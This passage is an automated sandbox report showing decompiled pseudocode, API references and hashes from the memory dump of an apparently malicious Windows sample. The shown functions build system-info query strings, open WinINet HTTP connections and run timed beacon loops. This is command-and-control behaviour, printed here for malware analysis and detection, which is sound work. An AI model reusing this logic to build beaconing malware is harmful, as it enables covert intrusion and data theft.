					_t44 = wsprintfA(_t113 + _t98, _t4, _t40);
					_t122 = _t120 + 0x38;
					_t114 = _t113 + _t44;
					if(_a12 != 0) {
						_t93 =  *0x109a348; // 0xa6d5a8
						_t8 = _t93 + 0x109b676; // 0x732526
						_t96 = wsprintfA(_t114 + _t98, _t8, _a12);
						_t122 = _t122 + 0xc;
						_t114 = _t114 + _t96;
					}
					_t45 =  *0x109a348; // 0xa6d5a8
					_t10 = _t45 + 0x109b2de; // 0x74636126
					_t48 = wsprintfA(_t114 + _t98, _t10, 0);
					_t123 = _t122 + 0xc;
					_t115 = _t114 + _t48; // executed
					_t49 = E0109131C(_t99); // executed
					_t105 = _t49;
					if(_t105 != 0) {
						_t88 =  *0x109a348; // 0xa6d5a8
						_t12 = _t88 + 0x109b8c2; // 0x736e6426
						_t91 = wsprintfA(_t115 + _t98, _t12, _t105);
						_t123 = _t123 + 0xc;
						_t115 = _t115 + _t91;
						HeapFree( *0x109a2d8, 0, _t105);
					}
					_t106 = E010916DD();
					if(_t106 != 0) {
						_t83 =  *0x109a348; // 0xa6d5a8
						_t14 = _t83 + 0x109b8ca; // 0x6f687726
						_t86 = wsprintfA(_t115 + _t98, _t14, _t106);
						_t123 = _t123 + 0xc;
						_t115 = _t115 + _t86;
						HeapFree( *0x109a2d8, 0, _t106);
					}
					_t107 =  *0x109a3cc; // 0x1b09600
					_a20 = E01093A89(0x109a00a, _t107 + 4);
					_t53 =  *0x109a36c; // 0x1b095b0
					_t109 = 0;
					if(_t53 != 0) {
						_t80 =  *0x109a348; // 0xa6d5a8
						_t17 = _t80 + 0x109b889; // 0x3d736f26
						wsprintfA(_t115 + _t98, _t17, _t53);
					}
					if(_a20 != _t109) {
						_t116 = RtlAllocateHeap( *0x109a2d8, _t109, 0x800);
						if(_t116 != _t109) {
							E0109785D(GetTickCount());
							_t59 =  *0x109a3cc; // 0x1b09600
							__imp__(_t59 + 0x40);
							asm("lock xadd [eax], ecx");
							_t63 =  *0x109a3cc; // 0x1b09600
							__imp__(_t63 + 0x40);
							_t65 =  *0x109a3cc; // 0x1b09600
							_t66 = E0109581D(1, _t103, _t98,  *_t65); // executed
							_t119 = _t66;
							asm("lock xadd [eax], ecx");
							if(_t119 != _t109) {
								StrTrimA(_t119, 0x1099280);
								_push(_t119);
								_t71 = E010911A3();
								_v20 = _t71;
								if(_t71 != _t109) {
									_t110 = __imp__;
									 *_t110(_t119, _v8);
									 *_t110(_t116, _v8);
									_t111 = __imp__;
									 *_t111(_t116, _v32);
									 *_t111(_t116, _t119);
									_t77 = E01095B63(0xffffffffffffffff, _t116, _v28, _v24); // executed
									_v56 = _t77;
									if(_t77 != 0 && _t77 != 0x10d2) {
										E01091103();
									}
									HeapFree( *0x109a2d8, 0, _v48);
									_t109 = 0;
								}
								HeapFree( *0x109a2d8, _t109, _t119);
							}
							RtlFreeHeap( *0x109a2d8, _t109, _t116); // executed
						}
						HeapFree( *0x109a2d8, _t109, _a12);
					}
					RtlFreeHeap( *0x109a2d8, _t109, _t98); // executed
				}
				return _v16;
			}

0x01093660
0x01093660
0x01093660
0x01093675
0x01093677
0x0109367c
0x01093680
0x01093688
0x0109368e
0x01093692
0x0109369a
0x010936a2
0x010936a2
0x010936a4
0x010936b0
0x010936bf
0x010936c4
0x010936c7
0x010936cc
0x010936cf
0x010936d4
0x010936d7
0x010936e3
0x010936f0
0x010936f2
0x010936f8
0x010936fd
0x01093708
0x0109370a
0x0109370d
0x01093713
0x01093715
0x0109371e
0x01093729
0x0109372b
0x0109372e
0x0109372e
0x01093730
0x01093735
0x01093741
0x01093743
0x01093746
0x01093748
0x0109374d
0x01093751
0x01093753
0x01093758
0x01093764
0x01093766
0x01093772
0x01093774
0x01093774
0x0109377f
0x01093783
0x01093785
0x0109378a
0x01093796
0x01093798
0x010937a4
0x010937a6
0x010937a6
0x010937ac
0x010937bf
0x010937c3
0x010937c8
0x010937cc
0x010937cf
0x010937d4
0x010937de
0x010937e0
0x010937e7
0x010937ff
0x01093803
0x0109380f
0x01093814
0x0109381d
0x0109382e
0x01093832
0x0109383b
0x01093841
0x01093849
0x0109384e
0x0109385b
0x01093861
0x0109386d
0x01093873
0x01093874
0x01093879
0x0109387f
0x01093885
0x0109388c
0x01093893
0x01093899
0x010938a0
0x010938a4
0x010938af
0x010938b4
0x010938ba
0x010938c3
0x010938c3
0x010938d4
0x010938da
0x010938da
0x010938e4
0x010938e4
0x010938f2
0x010938f2
0x01093903
0x01093903
0x01093911
0x01093911
0x01093922

APIs

RtlAllocateHeap.NTDLL ref: 01093688
GetTickCount.KERNEL32 ref: 0109369C
wsprintfA.USER32 ref: 010936EB
wsprintfA.USER32 ref: 01093708
wsprintfA.USER32 ref: 01093729
wsprintfA.USER32 ref: 01093741
wsprintfA.USER32 ref: 01093764
HeapFree.KERNEL32(00000000,00000000), ref: 01093774
wsprintfA.USER32 ref: 01093796
HeapFree.KERNEL32(00000000,00000000), ref: 010937A6
wsprintfA.USER32 ref: 010937DE
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 010937F9
GetTickCount.KERNEL32 ref: 01093809
RtlEnterCriticalSection.NTDLL(01B095C0), ref: 0109381D
RtlLeaveCriticalSection.NTDLL(01B095C0), ref: 0109383B

Part of subcall function 0109581D: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,775EC740,0109384E,00000000,01B09600), ref: 01095848
Part of subcall function 0109581D: lstrlen.KERNEL32(00000000,?,775EC740,0109384E,00000000,01B09600), ref: 01095850
Part of subcall function 0109581D: strcpy.NTDLL ref: 01095867
Part of subcall function 0109581D: lstrcat.KERNEL32(00000000,00000000), ref: 01095872
Part of subcall function 0109581D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,0109384E,?,775EC740,0109384E,00000000,01B09600), ref: 0109588F

StrTrimA.SHLWAPI(00000000,01099280,00000000,01B09600), ref: 0109386D

Part of subcall function 010911A3: lstrlen.KERNEL32(01B09BD0,00000000,00000000,00000000,01093879,00000000), ref: 010911B3
Part of subcall function 010911A3: lstrlen.KERNEL32(?), ref: 010911BB
Part of subcall function 010911A3: lstrcpy.KERNEL32(00000000,01B09BD0), ref: 010911CF
Part of subcall function 010911A3: lstrcat.KERNEL32(00000000,?), ref: 010911DA

lstrcpy.KERNEL32(00000000,?), ref: 0109388C
lstrcpy.KERNEL32(00000000,?), ref: 01093893
lstrcat.KERNEL32(00000000,?), ref: 010938A0
lstrcat.KERNEL32(00000000,00000000), ref: 010938A4

Part of subcall function 01095B63: WaitForSingleObject.KERNEL32(00000000,747581D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01095C15

HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 010938D4
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 010938E4
RtlFreeHeap.NTDLL(00000000,00000000,00000000,01B09600), ref: 010938F2
HeapFree.KERNEL32(00000000,?), ref: 01093903
RtlFreeHeap.NTDLL(00000000,00000000), ref: 01093911

Strings

Uqt, xrefs: 01093774, 010937A6, 010938D4, 010938E4, 010938F2, 01093903, 01093911

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: Heap$Freewsprintf$lstrcatlstrlen$lstrcpy$AllocateCountCriticalSectionTickTrim$EnterLeaveObjectSingleWaitstrcpy
String ID: Uqt
API String ID: 186568778-2320327147
Opcode ID: a9983658b4aa361fc808d00ad52de6fe65b0d87816ebbd8c992bc8c462cd1c8f
Instruction ID: fb07d842a01bb3ee85ee65a15cf18a2bf0824749f6f2ef8b0c95ff2013f18d4f
Opcode Fuzzy Hash: a9983658b4aa361fc808d00ad52de6fe65b0d87816ebbd8c992bc8c462cd1c8f
Instruction Fuzzy Hash: 6071D571600205EFCB31AB69EC68E9B3BE8FBC8710B054554F9C9D7224D63BD905EB61

Uniqueness

Uniqueness Score: -1.00%

Function 01097AC4 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 126
networkstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E01097AC4(void* __eax, void* __ecx, long __esi, char* _a4) {
				void _v8;
				long _v12;
				void _v16;
				void* _t34;
				void* _t38;
				void* _t40;
				char* _t56;
				long _t57;
				void* _t58;
				intOrPtr _t59;
				long _t65;

				_t65 = __esi;
				_t58 = __ecx;
				_v16 = 0xea60;
				__imp__( *(__esi + 4));
				_v12 = __eax + __eax;
				_t56 = E01096A51(__eax + __eax + 1);
				if(_t56 != 0) {
					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
						E0109692B(_t56);
					} else {
						E0109692B( *(__esi + 4));
						 *(__esi + 4) = _t56;
					}
				}
				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
				 *(_t65 + 0x10) = _t34;
				if(_t34 == 0 || InternetSetStatusCallback(_t34, E01097A59) == 0xffffffff) {
					L15:
					return GetLastError();
				} else {
					ResetEvent( *(_t65 + 0x1c));
					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
					 *(_t65 + 0x14) = _t38;
					if(_t38 != 0 || GetLastError() == 0x3e5 && E010917ED( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
						_t59 =  *0x109a348; // 0xa6d5a8
						_t15 = _t59 + 0x109b73b; // 0x544547
						_v8 = 0x84404000;
						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65); // executed
						 *(_t65 + 0x18) = _t40;
						if(_t40 == 0) {
							goto L15;
						}
						_t57 = 4;
						_v12 = _t57;
						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
							_v8 = _v8 | 0x00000100;
							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
						}
						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
							goto L15;
						} else {
							return 0;
						}
					} else {
						goto L15;
					}
				}
			}

0x01097ac4
0x01097ac4
0x01097acf
0x01097ad6
0x01097ade
0x01097ae8
0x01097aee
0x01097b01
0x01097b11
0x01097b03
0x01097b06
0x01097b0b
0x01097b0b
0x01097b01
0x01097b21
0x01097b27
0x01097b2c
0x01097c15
0x00000000
0x01097b47
0x01097b4a
0x01097b5d
0x01097b63
0x01097b68
0x01097b90
0x01097ba3
0x01097bad
0x01097bb0
0x01097bb6
0x01097bbb
0x00000000
0x00000000
0x01097bbf
0x01097bcb
0x01097bdc
0x01097bde
0x01097bef
0x01097bef
0x01097bff
0x00000000
0x01097c11
0x00000000
0x01097c11
0x00000000
0x00000000
0x00000000
0x01097b68

APIs

lstrlen.KERNEL32(?,00000008,74714D40), ref: 01097AD6

Part of subcall function 01096A51: RtlAllocateHeap.NTDLL(00000000,00000000,01093005), ref: 01096A5D

InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 01097AF9
InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 01097B21
InternetSetStatusCallback.WININET(00000000,01097A59), ref: 01097B38
ResetEvent.KERNEL32(?), ref: 01097B4A
InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 01097B5D
GetLastError.KERNEL32 ref: 01097B6A
HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 01097BB0
InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 01097BCE
InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 01097BEF
InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 01097BFB
InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 01097C0B
GetLastError.KERNEL32 ref: 01097C15

Part of subcall function 0109692B: RtlFreeHeap.NTDLL(00000000,00000000,01093092,00000000,?,00000000,00000000), ref: 01096937

Strings

@MqtNqt, xrefs: 01097B6A, 01097C15

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
String ID: @MqtNqt
API String ID: 2290446683-2883916605
Opcode ID: b8b742b29e420729795d4906dc8682931244d4693381feb1db155e37b0e01f22
Instruction ID: c76805e47aaf7052e0c3f4852c5e741aca4e5a249936abd0ca9b4a03d13023a9
Opcode Fuzzy Hash: b8b742b29e420729795d4906dc8682931244d4693381feb1db155e37b0e01f22
Instruction Fuzzy Hash: D7419DB2600204BFDB319FA5DC68EAB7BFCFB84744B100928F283D2091E636A540DF20

Uniqueness

Uniqueness Score: -1.00%

Function 010948D3 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 151
timememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E010948D3(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void _v48;
				long _v52;
				struct %anon52 _v60;
				char _v72;
				long _v76;
				void* _v80;
				union _LARGE_INTEGER _v84;
				struct %anon52 _v92;
				void* _v96;
				void* _v100;
				union _LARGE_INTEGER _v104;
				long _v108;
				struct %anon52 _v124;
				long _v128;
				struct %anon52 _t46;
				void* _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				struct %anon52 _t66;
				void* _t69;
				void* _t73;
				signed int _t74;
				void* _t76;
				void* _t78;
				void** _t82;
				signed int _t86;
				void* _t89;

				_t76 = __edx;
				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v60 = _t46;
				if(_t46 == 0) {
					_v92.HighPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x109a2e0);
					_v76 = 0;
					_v80 = 0;
					L0109821A();
					_v84.LowPart = _t46;
					_v80 = _t76;
					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
					_t51 =  *0x109a30c; // 0x16c
					_v76 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
					_v108 = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x109a2ec = 5;
						} else {
							_t69 = E01095E69(_t76); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v104.LowPart = 0;
						L6:
						L6:
						if(_v104.LowPart == 1 && ( *0x109a300 & 0x00000001) == 0) {
							_v104.LowPart = 2;
						}
						_t74 = _v104.LowPart;
						_t58 = _t74 << 4;
						_t78 = _t89 + (_t74 << 4) + 0x38;
						_t75 = _t74 + 1;
						_v92.LowPart = _t74 + 1;
						_t61 = E01093AFC( &_v96, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
						_v124 = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v92;
						_v104.LowPart = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_v124.HighPart = E0109290F(_t75,  &_v72, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x109a2e4);
							goto L21;
						} else {
							__eflags =  *0x109a2e8; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E01091103();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x109a2e8);
								L21:
								L0109821A();
								_v104.LowPart = _t61;
								_v100 = _t78;
								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
								_v128 = _t65;
								__eflags = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t82 =  &_v72;
					_t73 = 3;
					do {
						_t54 =  *_t82;
						if(_t54 != 0) {
							HeapFree( *0x109a2d8, 0, _t54);
						}
						_t82 =  &(_t82[4]);
						_t73 = _t73 - 1;
					} while (_t73 != 0);
					CloseHandle(_v80);
				}
				return _v92.HighPart;
				goto L25;
			}

0x010948d3
0x010948e9
0x010948ed
0x010948f2
0x010948f9
0x010948ff
0x01094905
0x01094a8c
0x0109490b
0x0109490b
0x0109490d
0x01094912
0x01094913
0x01094919
0x0109491d
0x01094921
0x0109492f
0x0109493d
0x01094941
0x01094943
0x01094950
0x0109495c
0x0109495e
0x01094964
0x0109496d
0x01094978
0x01094978
0x0109496f
0x0109496f
0x01094976
0x00000000
0x00000000
0x01094976
0x01094982
0x00000000
0x01094986
0x0109498b
0x01094996
0x01094996
0x0109499e
0x010949a4
0x010949ac
0x010949b5
0x010949bc
0x010949c0
0x010949c5
0x010949cb
0x00000000
0x00000000
0x010949cd
0x010949d1
0x010949d8
0x00000000
0x010949da
0x010949ea
0x010949ea
0x00000000
0x01094a1b
0x01094a1b
0x01094a20
0x01094a3f
0x01094a41
0x01094a46
0x01094a47
0x00000000
0x01094a22
0x01094a22
0x01094a28
0x00000000
0x01094a2a
0x01094a2a
0x01094a2f
0x01094a31
0x01094a36
0x01094a37
0x01094a4d
0x01094a4d
0x01094a55
0x01094a63
0x01094a67
0x01094a73
0x01094a75
0x01094a79
0x01094a7b
0x00000000
0x01094a81
0x00000000
0x01094a81
0x01094a7b
0x01094a28
0x00000000
0x01094a20
0x010949ee
0x010949f0
0x010949f4
0x010949f5
0x010949f5
0x010949f9
0x01094a03
0x01094a03
0x01094a09
0x01094a0c
0x01094a0c
0x01094a13
0x01094a13
0x01094a9a
0x00000000

APIs

memset.NTDLL ref: 010948ED
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 010948F9
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 01094921
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 01094941
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,01091E4E,?), ref: 0109495C
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,01091E4E,?,00000000), ref: 01094A03
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,01091E4E,?,00000000,?,?), ref: 01094A13
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 01094A4D
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 01094A67
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 01094A73

Part of subcall function 01095E69: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,01B093D8,00000000,?,7476F710,00000000,7476F730), ref: 01095EB8
Part of subcall function 01095E69: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,01B09410,?,00000000,30314549,00000014,004F0053,01B093CC), ref: 01095F55
Part of subcall function 01095E69: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,01094974), ref: 01095F67

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,01091E4E,?,00000000,?,?), ref: 01094A86

Strings

Uqt, xrefs: 01094A03
@MqtNqt, xrefs: 01094A86

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID: Uqt$@MqtNqt
API String ID: 3521023985-3266969629
Opcode ID: 326577785a4958783acbcc1413fbb964af2d2ccc6027258ad71effcd771b6ebd
Instruction ID: b70ab0b3c210c635d382dd2c1ca0f2dfd10f1e534214dc02aa605d8ea2904090
Opcode Fuzzy Hash: 326577785a4958783acbcc1413fbb964af2d2ccc6027258ad71effcd771b6ebd
Instruction Fuzzy Hash: 54519D71008320AFDB21EF199C54D9BBBE8FB89324F108A1EF4E4C2290D7768505DF92

Uniqueness

Uniqueness Score: -1.00%

Function 01097F05 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 209
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E01097F05(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x1090000;
				_t115 = _t139[3] + 0x1090000;
				_t131 = _t139[4] + 0x1090000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x1090000;
				_v16 = _t139[5] + 0x1090000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x1090002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x109a1c0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x109a1c0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x109a1c0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x109a1bc; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x109a1c0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x109a1b8; // 0x0
										 *_t102 = _t125;
										 *0x109a1b8 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x109a1bc; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

0x01097f14
0x01097f2a
0x01097f30
0x01097f32
0x01097f37
0x01097f3d
0x01097f42
0x01097f45
0x01097f53
0x01097f5a
0x01097f5d
0x01097f60
0x01097f61
0x01097f64
0x01097f67
0x01097f6a
0x01097f6f
0x01097f7e
0x00000000
0x01097f84
0x01097f8e
0x01097f98
0x01097f9d
0x01097f9f
0x01097fa9
0x01097fac
0x01097faf
0x01097fb5
0x01097fb7
0x01097fb7
0x01097fba
0x01097fbd
0x01097fc2
0x01097fc6
0x01097fd9
0x01097fdb
0x01098083
0x01098083
0x0109808a
0x0109808d
0x01098097
0x01098097
0x0109809b
0x01098119
0x0109811c
0x0109811e
0x0109811e
0x01098125
0x01098127
0x01098131
0x01098134
0x01098137
0x01098137
0x00000000
0x0109809d
0x010980a0
0x010980ce
0x010980d8
0x010980dc
0x010980e4
0x010980e7
0x010980ee
0x010980f8
0x010980f8
0x010980fc
0x01098101
0x01098110
0x01098116
0x01098116
0x010980fc
0x00000000
0x010980a7
0x010980aa
0x010980b2
0x010980c7
0x010980cc
0x00000000
0x00000000
0x010980cc
0x00000000
0x010980b2
0x010980a0
0x0109809b
0x01097fe1
0x01097fe8
0x01097ff8
0x01097ffb
0x01098001
0x01098005
0x01098048
0x01098054
0x0109807d
0x01098056
0x0109805a
0x01098060
0x01098068
0x0109806a
0x0109806d
0x01098073
0x01098075
0x01098075
0x01098068
0x0109805a
0x00000000
0x01098054
0x0109800d
0x01098010
0x01098017
0x01098027
0x0109802a
0x0109803a
0x00000000
0x01098040
0x01098021
0x01098025
0x00000000
0x00000000
0x00000000
0x01098025
0x01097ff2
0x01097ff6
0x00000000
0x00000000
0x00000000
0x01097ff6
0x01097fcf
0x01097fd3
0x00000000
0x00000000
0x00000000

APIs

RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01097F7E
LoadLibraryA.KERNELBASE(?), ref: 01097FFB
GetLastError.KERNEL32 ref: 01098007
RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 0109803A

Strings

$, xrefs: 01097F53
@MqtNqt, xrefs: 01098007, 010980DE

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad
String ID: $$@MqtNqt
API String ID: 948315288-516465142
Opcode ID: a57ee76099287f9c78b654e0aa09548012a15283e1515c400424943081e9396f
Instruction ID: a856b9e1774715b87000cb5a86aab7f22a1c92f201c4a979fa1308e8554cee9b
Opcode Fuzzy Hash: a57ee76099287f9c78b654e0aa09548012a15283e1515c400424943081e9396f
Instruction Fuzzy Hash: AF814BB1A002099FDF61CF98C8A4AADBBF4FB88310F14802AF695E7340E775E945DB50

Uniqueness

Uniqueness Score: -1.00%

Function 010974C4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E010974C4(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
